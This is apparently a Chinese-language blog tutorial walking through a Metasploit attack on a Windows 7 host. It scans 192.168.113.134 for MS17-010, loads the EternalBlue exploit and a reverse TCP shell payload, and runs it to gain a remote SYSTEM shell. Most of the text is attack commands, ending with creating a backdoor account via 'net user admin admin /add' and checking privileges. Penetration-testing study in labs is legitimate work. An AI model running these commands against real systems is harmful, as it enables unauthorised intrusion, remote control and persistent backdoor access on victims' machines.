使用 msf 渗透攻击 Win7 主机并远程执行命令

实战-使用 msf 渗透攻击 Win7 主机并远程执行命令
通过 msf 模块获取 Win7 主机远程 shell

  1. 先扫描目标是否存在 ms17-010 漏洞
    msf6 > search ms17-010
    image
  2. 使用 use 命令选中这个模块
    msf6 > use auxiliary/scanner/smb/smb_ms17_010
    image
  3. 查看模块需要配置的信息
    msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
    image
    需要我们配置 RHOST 主机 IP
    msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.113.134
    image
    开始扫描
    msf6 auxiliary(scanner/smb/smb_ms17_010) > run
    image
    查找攻击模块
    msf6 > search ms17-010
    image
    使用 use 命令加载模块
    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
    image
    设置目标主机IP
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.113.134
    查看 exploit target目标类型:
    msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
    image
    msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell
    type:payload
    image
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload
    windows/x64/shell/reverse_tcp
    查看一下 payloads 需要配置什么信息
    msf6 exploit(windows/smb/ms17_010_eternalblue) > show options #查看加载到的
    payload信息
    image
    msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
    image
    image
    直接执行的话会获得目标主机的 SEHLL
    使用 DOS 命令创建用户
    C:\Windows\system32>net user admin admin /add
    image
    C:\Windows\system32>chcp 65001
    查看用户
    C:\Windows\system32>net user
    image
    查看拿到的用户权限
    C:\Windows\system32>whoami
    image
    关闭链接 Ctrl+c
    Abort session 1? [y/N]
    image
posted @ 2025-07-16 14:57  长温不喜风云  阅读(56)  评论(0)    收藏  举报